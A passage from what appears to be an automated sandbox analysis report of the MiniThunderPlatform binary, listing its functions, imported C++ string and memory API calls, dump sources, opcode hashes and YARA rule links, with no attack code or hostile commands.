                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@
                                                                                                                                              • String ID: bytes_from_dphub_res$bytes_from_nondphub_res$bytes_from_overlap_res$p2p_sub_task_for_dphub
                                                                                                                                              • API String ID: 1506095285-3153554061
                                                                                                                                              • Opcode ID: 33a4947e444ab5fc0064a253755aa5efe60d1d840d95205bf3cbbe3263e87969
                                                                                                                                              • Instruction ID: 1ccc0651ecc7e168be8c7fbdb582b601ef0a971fe2eda536788b223ebae38d96
                                                                                                                                              • Opcode Fuzzy Hash: 33a4947e444ab5fc0064a253755aa5efe60d1d840d95205bf3cbbe3263e87969
                                                                                                                                              • Instruction Fuzzy Hash: 39515D791087409FC315CF68C888A9BBBF5FFD9704F544A5DF59A832A1DB35A844CB12
                                                                                                                                              Function 100956E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Location), ref: 10095739
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009575F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10095780
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10095793
                                                                                                                                              • ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71 ref: 100957AE
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(102768F0), ref: 100957C7
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000000), ref: 100957DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?), ref: 100957F3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009580A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$??$?8??4?$basic_string@?erase@?$basic_string@?find_first_not_of@?$basic_string@D@1@@std@@D@2@@0@0@V01@V12@V?$basic_string@
                                                                                                                                              • String ID: Location
                                                                                                                                              • API String ID: 3948317842-2817059741
                                                                                                                                              • Opcode ID: 814f40ab18642fa11b77977b6ca5781ad7b63ccc6de718692a511786fbd09a5f
                                                                                                                                              • Instruction ID: a37594c30a467000d0f392824ff80e6cb15a7d6866cf3dc99a8fd1be633cf314
                                                                                                                                              • Opcode Fuzzy Hash: 814f40ab18642fa11b77977b6ca5781ad7b63ccc6de718692a511786fbd09a5f
                                                                                                                                              • Instruction Fuzzy Hash: C1319A31208351EFC310DF55D898BAABBE4FBA9755F40461CF85A83291DB71A948CF52
                                                                                                                                              Function 100955A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009560E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Transfer-Encoding,?,?), ref: 100955E9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?), ref: 10095633
                                                                                                                                              • ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(1027B92C,00000000,00000002), ref: 1009564E
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000000), ref: 10095665
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(chunked), ref: 10095674
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1009569B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100956A9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8?erase@?$basic_string@?find_first_not_of@?$basic_string@D@1@@std@@D@2@@0@0@V12@V?$basic_string@
                                                                                                                                              • String ID: Transfer-Encoding$chunked
                                                                                                                                              • API String ID: 3701770573-3440583460
                                                                                                                                              • Opcode ID: 9dc44b9381dc6de4f8c1bf22363c9373e1b479e428e33b08bb8e1d02433cd211
                                                                                                                                              • Instruction ID: 05b01f3e2dddfeea48f4f04059fd789c431ba5689ed30b1c55635bd368ba9534
                                                                                                                                              • Opcode Fuzzy Hash: 9dc44b9381dc6de4f8c1bf22363c9373e1b479e428e33b08bb8e1d02433cd211
                                                                                                                                              • Instruction Fuzzy Hash: 6431F232508750DFC320CF24C898BAAB7E8FFA9751F40060DF59A832A1DB71A848CF52
                                                                                                                                              Function 100955D8 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009560E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?), ref: 10095633
                                                                                                                                              • ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(1027B92C,00000000,00000002), ref: 1009564E
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000000), ref: 10095665
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(chunked), ref: 10095674
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Transfer-Encoding,?,?), ref: 100955E9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1009569B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100956A9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8?erase@?$basic_string@?find_first_not_of@?$basic_string@D@1@@std@@D@2@@0@0@V12@V?$basic_string@
                                                                                                                                              • String ID: Transfer-Encoding$chunked
                                                                                                                                              • API String ID: 3701770573-3440583460
                                                                                                                                              • Opcode ID: 78fb22c841259e9b0d5e68790cb9bcaf28de9ca6dd4d9491dc4e4a018920333b
                                                                                                                                              • Instruction ID: a9e1fa13d08dc8662eb5a1eea4d2872ee8004d653eb6d114c6f60a8308318921
                                                                                                                                              • Opcode Fuzzy Hash: 78fb22c841259e9b0d5e68790cb9bcaf28de9ca6dd4d9491dc4e4a018920333b
                                                                                                                                              • Instruction Fuzzy Hash: FA217E315083519FD324DF20C898BAAB7E4FFA9745F44450DF59A832A2DB71A548CF52
                                                                                                                                              Function 100F02A1 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100F02A6
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(cmd_report_correction,?,?,?), ref: 100F02C1
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,7C3F18B8,?,?,?), ref: 100F02E1
                                                                                                                                              • memset.MSVCR71(?,00000000,00000014,?,?,?), ref: 100F02F1
                                                                                                                                              • memset.MSVCR71(?,00000000,00000014,?,00000000,00000014,?,?,?), ref: 100F030C
                                                                                                                                                • Part of subcall function 100F020E: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,100F031F,?,?,?,?,?,?), ref: 100F0225
                                                                                                                                                • Part of subcall function 1006E2C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E2FD
                                                                                                                                                • Part of subcall function 1006E2C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1006E342
                                                                                                                                                • Part of subcall function 1006E2C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E354
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?,?,?), ref: 100F032F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?), ref: 100F033C
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1007196D
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 10071984
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env), ref: 10071998
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719CF
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719DE
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719ED
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?,?,?,?), ref: 100F035F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?), ref: 100F036C
                                                                                                                                                • Part of subcall function 10071870: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(product_flag,00000000,0000009C,?), ref: 10071896
                                                                                                                                                • Part of subcall function 10071870: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100718AD
                                                                                                                                                • Part of subcall function 10071870: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071909
                                                                                                                                                • Part of subcall function 10071870: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007191B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$V12@$?assign@?$basic_string@V12@@memset$??3@??4?$basic_string@?erase@?$basic_string@H_prologV01@V01@@
                                                                                                                                              • String ID: cmd_report_correction
                                                                                                                                              • API String ID: 1890770410-1491319297
                                                                                                                                              • Opcode ID: acfda1c071765056ba1b3996095e549eded5f96e8e74304fbf6ab59c212d972f
                                                                                                                                              • Instruction ID: ccb9c1e614a26c9718e78f5b2bb1a5c7b9b7f6c29721df8e35743f53bdcff324
                                                                                                                                              • Opcode Fuzzy Hash: acfda1c071765056ba1b3996095e549eded5f96e8e74304fbf6ab59c212d972f
                                                                                                                                              • Instruction Fuzzy Hash: B7218C71900614EFD724DFA5CC8DADAB7F8FF58710F00465DE06A932A1EB706949CB20
                                                                                                                                              Function 10075589 Relevance: 16.6, APIs: 11, Instructions: 130COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1007558E
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • memcpy.MSVCR71(0000008C,?,?), ref: 10075607
                                                                                                                                              • memcpy.MSVCR71(000000A8,?,?), ref: 1007563B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075655
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075664
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075673
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100756B4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100756BD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100756CD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,?), ref: 10075710
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007571D
                                                                                                                                                • Part of subcall function 1008B399: __EH_prolog.LIBCMT ref: 1008B39E
                                                                                                                                                • Part of subcall function 1008B399: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,100755E4), ref: 1008B3BF
                                                                                                                                                • Part of subcall function 1008B399: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100755E4), ref: 1008B3CF
                                                                                                                                                • Part of subcall function 1008B399: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100755E4), ref: 1008B3DF
                                                                                                                                                • Part of subcall function 1008B399: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100755E4), ref: 1008B3EF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$?assign@?$basic_string@V12@V12@@$??1?$basic_string@H_prologmemcpy$malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2081339788-0
                                                                                                                                              • Opcode ID: 984a878c8e5e2307cd59505d2ceb8cfdcad2bd1b295cb4edbbb34a47a6ebfe24
                                                                                                                                              • Instruction ID: e5145a6b3d1a12e2992dfa4751d3adf2e4689ba9d7c83205e631dc3acb2e6172
                                                                                                                                              • Opcode Fuzzy Hash: 984a878c8e5e2307cd59505d2ceb8cfdcad2bd1b295cb4edbbb34a47a6ebfe24
                                                                                                                                              • Instruction Fuzzy Hash: 66515A75900259DFCB14CFA8C889ADEBBF4FF18314F00855AF89AA7251DB71AA45CF60
                                                                                                                                              Function 100740D2 Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100740D7
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10074132
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007413F
                                                                                                                                              • memcpy.MSVCR71(000000AC,?,00000014,?,?,?), ref: 1007419B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100741A9
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100741D3
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100741E2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10074224
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1007423A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10074247
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10074254
                                                                                                                                                • Part of subcall function 1008A9C7: __EH_prolog.LIBCMT ref: 1008A9CC
                                                                                                                                                • Part of subcall function 1008A9C7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,10073FBC), ref: 1008A9ED
                                                                                                                                                • Part of subcall function 1008A9C7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,10073FBC), ref: 1008A9FD
                                                                                                                                                • Part of subcall function 1008A9C7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,10073FBC), ref: 1008AA0D
                                                                                                                                                • Part of subcall function 1008A9C7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,10073FBC), ref: 1008AA1D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$?assign@?$basic_string@V12@V12@@$??1?$basic_string@$H_prolog$mallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1598780573-0
                                                                                                                                              • Opcode ID: 573e7960bea27c40aaadc7d45baeef64ea34a8a9593508cc9f5bb98b385c391d
                                                                                                                                              • Instruction ID: 5e90abacb77b80d51e32364a25f6290a0a080536ae595ba883ae369865761baf
                                                                                                                                              • Opcode Fuzzy Hash: 573e7960bea27c40aaadc7d45baeef64ea34a8a9593508cc9f5bb98b385c391d
                                                                                                                                              • Instruction Fuzzy Hash: 6B517C30900299DFDB11DFA8C888BDDBBF4FF19300F00859AE49AA7251DB34AA45CF61
                                                                                                                                              Function 100B03E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 135COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,00000001,00000000,?), ref: 100B0473
